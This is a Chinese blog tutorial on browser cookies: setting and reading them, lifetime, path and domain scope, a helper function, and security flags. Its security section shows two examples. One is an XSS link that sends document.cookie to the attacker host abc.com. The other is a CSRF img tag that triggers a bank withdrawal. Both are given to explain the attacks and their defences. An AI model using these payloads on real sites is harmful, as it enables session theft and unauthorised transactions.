cookie

最新推荐文章于 2022-02-15 10:09:09 发布
最新推荐文章于 2022-02-15 10:09:09 发布
阅读量277 收藏 2
点赞数
分类专栏: cookie 文章标签: cookie 会话跟踪技术 浏览器 客户端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44083366/article/details/101525526
版权

cookie

一、描述

cookie: 会话跟踪技术 客户端

cookie作用: 将网页中的数据保存到浏览器中

session: 会话跟踪技术 服务端

cookie是一个很小的文本文件,是浏览器储存在用户的机器上的。

Cookie是纯文本,没有可执行代码。储存一些服务器需要的信息,每次请求站点,会发送相应的cookie,这些cookie可以用来辨别用户身份信息等作用。

cookie可以包含任意的信息,不仅仅是id

 //添加cookie的键值对时,必须要分开单个添加,不能合并写在一起
 document.cookie = "name=lnj;";
 document.cookie = "age=33;";
 //错误写法:document.cookie = "name=lnj;age=33;gender=male;";

二、cookie生命周期

默认情况下生命周期是一次会话(浏览器被关闭)

​ 如果通过expires= ; 设置了过期时间, 并且过期时间没有过期, 那么下次打开浏览器还是存在

​ 如果通过expires= ; 设置了过期时间, 并且过期时间已经过期了,那么会立即删除保存的数据

<script>
       window.onload = function (ev) {
            var date = new Date();
            date.setDate(date.getDate() - 1);//设置过期时间
            document.cookie = "age=23;expires="+date.toGMTString()+";";
</script>

三、cookie注意点

cookie默认不会保存任何的数据

​ cookie不能一次性保存多条数据, 要想保存多条数据,只能一条一条的设置

​ cookie有大小和个数的限制

​ 个数限制: 20~50

​ 大小限制: 4KB左右

四、 cookie作用范围

同一个浏览器的同一个路径下可以访问(即文件名可以不同)

​ 如果在同一个浏览器中, 默认情况下 下一级路径就可以访问

​ 如果在同一个浏览器中, 想让上一级目录也能访问保存的cookie, 那么需要添加一个path属性才可以;

​ document.cookie = “name=zs;path=/;”;

​ 例如:

​ 保存到了www.it666.com/jQuery/Ajax/路径下

​ 要想上一级的 www.it666.com/jQuery/ 路径下也能访问,需要添加一个path属性才可以

​ 例如:

​ 在www.it666.com下面保存了一个cookie,

​ 那么我们在edu.it666.com中是无法访问的

​ 如果想在edu.it666.com中也能访问, 那么我们需要再添加一个domain属性才可以;

​ document.cookie = “name=zs;path=/;domain=it666.com;”;

五、封装一个cookie方法

<script>
        window.onload = function (ev) {
            // document.cookie = "age=88;";
            // addCookie("gender", "male");
            // addCookie("score", "998", 1, "/", "127.0.0.1");
            function addCookie(key, value, day, path, domain) {
                // 1.处理默认保存的路径
                var index = window.location.pathname.lastIndexOf("/")
                var currentPath = window.location.pathname.slice(0, index);
                path = path || currentPath;
                // 2.处理默认保存的domain
                domain = domain || document.domain;
                // 3.处理默认的过期时间
                if (!day) {
                    document.cookie = key + "=" + value + ";path=" + path + ";domain=" + domain + ";";
                } else {
                    var date = new Date();
                    date.setDate(date.getDate() + day);
                    document.cookie = key + "=" + value + ";expires=" + date.toGMTString() + ";path=" + path + ";domain=" + domain + ";";
                }
            }

            function getCookie(key) {
                // console.log(document.cookie);
                var res = document.cookie.split(";");
                // console.log(res);
                for (var i = 0; i < res.length; i++) {
                    // console.log(res[i]);
                    var temp = res[i].split("=");
                    // console.log(temp);
                    if (temp[0].trim() === key) {
                        return temp[1];
                    }
                }
            }
            console.log(getCookie("name"));
            // 默认情况下只能删除默认路径中保存的cookie, 如果想删除指定路径保存的cookie, 那么必须在删除的时候指定路径才可以
            function delCookie(key, path) {
                addCookie(key, getCookie(key), -1, path);
            }
            delCookie("name", "/");
        }
    </script>

六、hash

<script>
	window.location.hash = 3;
	console.log(window.location.hash.substring(1));//默认会打印#3
</script>

七、安全性

Secure: 设置了属性secure,cookie只有在https协议加密情况下才会发送给服务端。但是这并不是最安全的,由于其固有的不安全性,敏感信息也是不应该通过cookie传输的

禁止javascript操作cookie(为避免跨域脚本(xss)攻击,通过javascript的document.cookie无法访问带有HttpOnly标记的cookie。)
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2017 07:28:00 GMT; Secure; HttpOnly

八、第三方cookie

第三方cookie就是cookie的域和地址栏中的域不匹配,这种cookie通常被用在第三方广告网站。为了跟踪用户的浏览记录,并且根据收集的用户的浏览习惯,给用户推送相关的广告。

九、安全事故

网络窃听

网络上的流量可以被网络上任何计算机拦截,特别是未加密的开放式WIFI。这种流量包含在普通的未加密的HTTP清求上发送Cookie。在未加密的情况下,攻击者可以读取网络上的其他用户的信息,包含HTTP Cookie的全部内容,以便进行中间的攻击。比如:拦截cookie来冒充用户身份执行恶意任务(银行转账等)。

解决办法:服务器可以设置secure属性的cookie,这样就只能通过https的方式来发送cookies了。

DNS缓存中毒

如果攻击者可以使DNS缓存中毒,那么攻击者就可以访问用户的Cookie了,例如:攻击者使用DNS中毒来创建一个虚拟的NDS服务h123456.www.demo.com指向攻击者服务器的ip地址。然后攻击者可以从服务器 h123456.www.demo.com/img_01.png 发布图片。用户访问这个图片,由于 www.demo.com和h123456.www.demo.com是同一个子域,所以浏览器会把用户的与www.demo.com相关的cookie都会发送到h123456.www.demo.com这个服务器上,这样攻击者就会拿到用户的cookie搞事情。

一般情况下是不会发生这种情况,通常是网络供应商错误。

跨站点脚本XSS

使用跨站点脚本技术可以窃取cookie。当网站允许使用javascript操作cookie的时候,就会发生攻击者发布恶意代码攻击用户的会话,同时可以拿到用户的cookie信息。

例子:

<a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>

当用户点击这个链接的时候,浏览器就会执行onclick里面的代码,结果这个网站用户的cookie信息就会被发送到abc.com攻击者的服务器。攻击者同样可以拿cookie搞事情。

解决办法:可以通过cookie的HttpOnly属性,设置了HttpOnly属性,javascript代码将不能操作cookie。

跨站请求伪造CSRF

例如,SanShao可能正在浏览其他用户XiaoMing发布消息的聊天论坛。假设XiaoMing制作了一个引用ShanShao银行网站的HTML图像元素,例如,

<img  src = "http://www.bank.com/withdraw?user=SanShao&amount=999999&for=XiaoMing" >

如果SanShao的银行将其认证信息保存在cookie中,并且cookie尚未过期,(当然是没有其他验证身份的东西),那么SanShao的浏览器尝试加载该图片将使用他的cookie提交提款表单,从而在未经SanShao批准的情况下授权交易。

解决办法:增加其他信息的校验(手机验证码,或者其他盾牌)。

时光 time
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cookie路径的作用范围示例代码
PerserveZ的博客
10-10 509
pageEncoding="UTF-8"%> Insert title here Cookie cookie = new Cookie("cookiePath", "CookiePathValue"); //设置 Cookie 的作用范围cookie.setPath(request.getContextPath());   response.add
EditThisCookie.crx cookie编辑导入导出利器
06-29
《EditThisCookie.crx:强大的Cookie管理工具及与curl的集成》 在互联网浏览中,Cookie扮演着重要的角色,它们存储用户信息、保持登录状态、个性化网页内容等。EditThisCookie.crx是一款专为Chrome浏览器设计的强大...
控制 Cookie 的作用范围
weixin_34174132的博客
07-02 117
默认时,网站的所有 Cookies 都一起被存储在客户端,并且所有 Cookies 连同网站的任何请求一起被发送到服务器。换句话说,网站中的每个页面都能够为网站获取所有的 Cookies。但是,你能够通过两个方式来设置 Cookies 的作用范围: 把 Cookies 的作用范围限制到服务器的目录,从而允许你把 Cookies 限制到网站的某个应用...
cookie的作用范围
wzx735481897的博客
01-15 5587
cookie 的作用范围:只能作用于当前目录跟当前的子目录, 不能作用于上一级的目录,/代表当前站点的根目录,但是可以通过setPath() 来设置作用范,request.getContentType() 代表项目根目录。 现在我们使用setPath() 方法,用Cookiepath/Cookiepath_write.jsp  来反问../Cookiepath_read.jsp。
cookies设置以及作用范围
Scorpion-S的博客
09-20 4757
1.cookie的个数限制:不同浏览器有不同的标准,20~50个。 2.cookie的大小限制:4KB左右的大小 3.cookie的设置:只能一个一个设置,不能批量设置。 如:document.cookie = "key=value;"; 4.cookie的作用范围:同一个浏览器,同一个路径下cookie可以共享。如果上级路径想要访问,则设置path属性,如document.cookie = "k...
Cookie的作用范围
A little bit Step
05-12 1149
默认情况下,可以作用当前目录和当前
cookie实现自动登入
10-10
在互联网应用中,实现用户自动登录功能通常会利用Cookie这一技术Cookie是由服务器发送到用户的浏览器并存储在本地的一小块数据,它包含了用户的一些关键信息,如用户名、登录状态等,以便下次用户访问时,服务器能...
flask-session-cookie-manager
01-29
标题“flask-session-cookie-manager”指的是一个Python应用,它专门针对Flask框架,用于管理和操作session cookie。在Web开发中,session cookie是服务器用来跟踪用户状态的一种方式,特别是在无状态的HTTP协议上...
cookie的作用域
betterangela的博客
10-13 4166
cookie的作用域 cookie有一个很重要的概念,就是cookie的作用域。 1.首先,cookie的作用域为当前域及其子域。2.那发起http请求时,浏览器能传过去的是种在自己域和父域上的cookie。 即,假设发起请求的域名是a.qq.com,那如果cookie-xxx是种在qq.com域上的,则该cookie就可以被a.qq.com或者b.qq.com或者qq.com发起的请求所使用; 等于是说发起请求时,能拿到的是自己域和父域上的cookie。 这就是为什么我们首先要去qq站或者woa
COOKIE的作用域
wang78699425的专栏
11-07 2245
cookie的两个重要属性是生存周期和路径。不同的应用共享同一个cookie,路径最易出问题。不同目录的不同应用,只有在设置相同的的cookie路径,才能正确共享同一cookie。 以下内容摘自互联网: js操作cookie的作用域。默认情况下js操作cookie的作用域是目录级的,也就是在当前目录下设置的cookie,当前目录及该目录下的所有子目录下的所有文件都能够访问该cookie,设置c
cookie的用途
qq_43405603的博客
02-15 7148
1、 Cookie 能够保存有关访问者的信息。更概括地说,Cookie 是一种保持 Web 应用程序连续性的方法。 例如,购物站点上的 Web 服务器跟踪每个购物者,以便站点能够管理购物车和其他的用户相关信息。 因此 Cookie 的作用就类似于名片,它提供了相关的标识信息,可以帮助应用程序确定如何继续执行。 2、当然使用 Cookie 能够达到多种目的,所有这些目的都是为了使 Web 站点记住您。 例如,一个实施民意测验的站点可以......
Cookie四种范围对象作用域
Nattevak
03-15 584
一、pageContext JSP页面容器 pageContext.jsp <% pageContext.setAttribute("hello", "word"); request.getRequestDispatcher("pc1.jsp").forward(request, response); %> <%=pageContext.getAt...
Cookie之生效目录范围与有效期、域名等限制
fks的博客
08-16 1045
今天在做项目的时候偶然发现一个问题,在我localhost/login/userlogin下面设置的cooikes,在localhost/portal/portalIndex里面取不出来,但是在原来的localhost/login/userlogin下面是能取出来的,仔细看了一下Cookie的参数,我才知道cookie不只是设置key 跟value,还可以限制其他一些东西: 详细参数参考点这里...
(浅谈)session,cookies作用范围区别,使用场景
HelloCode的博客
06-29 926
区别: ​ cookie数据保存在客户端,session数据保存在服务器端。 使用场景: ​ session: ​ 登陆验证信息。一般采用Session(“Logon”)=true or false的形式。 ​ 用户的各种私人信息,比如姓名等,某种情况下,需要保存在Session里 ​ 需要在页面间传递的内容信息,比如调查工作需要分好几步。每一步的信息都保存在Session里,最后在统一更新...
cookie和session的作用、区别、应用范围,session的工作原理???
一切都会好起来的,即使不在今天
10-23 1387
Cookie:主要用在保存客户端,其值在客户端与服务端之间传送,不安全,存储的数据量有限。 Session:保存在服务端,每一个session在服务端有一个sessionID作一个标识。存储的数据量大,安全性高。占用服务端的内存资源。 ...
vba cookie
最新发布
06-20
在VBA(Visual Basic for Applications)中,Cookie并不是直接的编程概念,它通常指的是网页浏览器中的小数据存储,用于记录用户的偏好或会话状态。然而,在编写与Web浏览器交互的VBA宏时,可能会用到一些方法来模拟或操作这些cookies。 VBA与浏览器(如Internet Explorer)通信主要通过HTMLObject和XMLHTTP60对象,可以通过这些对象的setCookie和getCookie方法来处理cookies。以下是一个简单的例子: ```vba Sub SetCookie() Dim ie As Object Set ie = CreateObject("InternetExplorer.Application") '设置cookie ie.document.cookie = "myCookieKey=myCookieValue; expires=Monday, 11-Jul-2022 00:00:00 GMT; path=/" ie.Quit End Sub Sub GetCookie() Dim ie As Object Set ie = CreateObject("InternetExplorer.Application") '获取cookie Dim cookieValue As String cookieValue = ie.document.cookie Debug.Print cookieValue '打印获取的cookie ie.Quit End Sub ``` 在这个例子中,SetCookie宏设置了一个新的cookie,而GetCookie宏则从当前页面获取所有cookies。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值